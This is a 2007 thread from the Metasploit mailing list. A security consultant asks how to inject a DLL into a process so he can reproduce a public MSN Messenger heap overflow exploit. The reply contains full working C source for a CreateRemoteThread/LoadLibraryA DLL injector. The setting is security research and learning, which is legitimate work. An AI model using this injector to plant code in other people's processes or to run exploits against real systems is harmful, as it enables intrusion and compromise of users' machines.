[framework] DLL Process Injection

Danux danuxx at gmail.com
Fri Sep 14 14:44:05 CDT 2007 

Wonderfulllllllll!!!! thats what i was looking for

Thanks friends

On 9/14/07, Pusscat <pusscat at metasploit.com> wrote:
> Try this:
>
> #include <windows.h>
> #include <stdlib.h>
> #include <stdio.h>
>
> int main(int argc, char **argv) {
>     HRESULT     Status;
>     HANDLE      process;
>     DWORD       pid;
>     HANDLE processHandle = 0;
>     HANDLE threadHandle = 0;
>     LPVOID stringAddress = NULL;
>     LPCSTR dllName = NULL;
>     ULONG64     funcAddr64;
>     ULONG       *funcAddr, i;
>
>     if (argc < 3) {
>         printf("injectDLL <dll to inject> <pid to inject into>\n\n");
>         return (0);
>     }
>
>     pid = strtoul(argv[2], NULL, 10);
>     dllName = argv[1];
>     printf("Injecting DLL %s into pid %d... ", argv[1],  pid);
>
>     if(!(processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid))){
>         printf("OpenProcess() failed\n");
>         return (-1);
>     }
>     if(!(stringAddress = VirtualAllocEx(processHandle, NULL,
>             strlen(dllName), MEM_COMMIT, PAGE_EXECUTE_READWRITE))) {
>         printf("VirtualAllocEx() failed.\n");
>         CloseHandle(processHandle);
>         return (-1);
>     }
>     if(!WriteProcessMemory(processHandle, (LPVOID)stringAddress, dllName,
> strlen(dllName), NULL)) {
>         printf("WriteProcessMemory() failed.\n");
>         VirtualFreeEx(processHandle, stringAddress, strlen(dllName),
> MEM_DECOMMIT);
>         CloseHandle(processHandle);
>         return (-1);
>     }
>     printf("DLL Injected.\n");
>
>     if(!(threadHandle = CreateRemoteThread(processHandle, NULL, 0,
>
> (LPTHREAD_START_ROUTINE)GetProcAddress(LoadLibrary("kernel32.dll"),
>                 "LoadLibraryA"), (LPVOID)stringAddress, 0, NULL))) {
>         printf("CreateRemoteThread() failed.\n");
>         VirtualFreeEx(processHandle, stringAddress, strlen(dllName),
> MEM_DECOMMIT);
>         CloseHandle(processHandle);
>         return (-1);
>     }
>     CloseHandle(threadHandle);
>     CloseHandle(processHandle);
>
>     return (0);
> }
>
> ~ Puss
>
>
> -----Original Message-----
> From: Danux [mailto:danuxx at gmail.com]
> Sent: Friday, September 14, 2007 1:24 PM
> To: framework at metasploit.com
> Subject: [framework] DLL Process Injection
>
> Hi, i dont know if this is the right place to ask, but i know you have
> the skill to help me.
>
> Recently i was trying to reporduce a new exploit, i mean: MSN
> messenger 7.x (8.0?) VIDEO Remote Heap Overflow Exploit,
>
> But following the instructions on milw0rm:
> http://www.milw0rm.com/sploits/08292007-exp_msn.rar
>
> They say i need to: "inject the dll to msn messenger .... process.
>
> I know metasploit already works that way but i would like to learn how
> to do it manually.
>
> I have no skill about DLL programming nor injection, do you have a
> tutorial or something like that to understand it?
>
> Thanks in advance.
>
> --
> Danux, CISSP
> Chief Information Security Officer
> Macula Security Consulting Group
> www.macula-group.com
>
>


-- 
Danux, CISSP
Chief Information Security Officer
Macula Security Consulting Group
www.macula-group.com

More information about the framework mailing list